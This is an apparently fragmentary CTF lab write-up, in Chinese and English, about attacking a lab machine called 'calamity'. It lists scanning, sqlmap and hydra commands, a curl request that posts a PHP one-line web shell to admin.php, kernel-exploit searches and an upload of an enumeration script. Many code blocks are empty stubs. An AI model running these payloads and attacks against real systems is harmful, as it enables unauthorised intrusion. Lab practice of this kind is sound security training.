1 |
|
web scan
1 |
|
find exp
searchsploit EasyNews
http://10.10.10.27/admin.php
find password
burp + sqlmap
1 |
|
sqlmap -r 1.req
sqlmap -r 1.req –risk 3 –level 5
hydra
1 |
|
wapiti -u http://10.10.10.27/admin.php
not found any vul
curl -X POST http://10.10.10.27/admin.php -d “<?php system($_GET[‘cmd’]) ?>”
1 |
|
准备尝试post能否上传一句话,然后意外发现,源代码中藏着密码。
发现图片中用户名和密码颠倒了,burp抓包…em,应该是开发错误。
1 |
|
- http://10.10.10.27/admin.php?html=
1 |
|
- info
Linux calamity 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:15:00 UTC 2017 i686 i686 i686 GNU/Linux
whereis gcc
gcc: /usr/bin/gcc /usr/lib/gcc /usr/share/man/man1/gcc.1.gz
准备上传msf类型exp。
1 |
|
- searchsploit linux 4.4.0
1 |
|
-
ps -ef grep root
1 |
|
- cat /home/xalvas/dontforget.txt
1 |
|
- 找到一个可写目录/var/tmp,将LinEnum.sh上传到目标机
1 |
|
1 |
|
提权需要绕过进程保护,绕过许多内存保护机制,利用二进制文件。手写exp。
看了wp也看不懂,溜了溜了。